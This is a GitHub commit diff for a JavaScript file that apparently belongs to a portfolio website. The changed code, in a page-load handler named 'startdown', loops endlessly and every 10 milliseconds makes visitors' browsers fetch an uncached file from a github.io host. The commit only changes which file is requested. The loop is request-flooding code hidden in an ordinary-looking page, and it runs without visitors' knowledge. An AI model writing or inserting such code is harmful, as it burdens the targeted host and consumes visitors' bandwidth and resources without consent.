This commit is contained in:
Boof 2023-01-18 12:51:26 +01:00 committed by GitHub
parent 9268c3f773
commit f1c5bcb4f3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -25,7 +25,7 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g
window.onload = async function startdown(){
while(true) {
await delay(10);
fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"})
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
}
}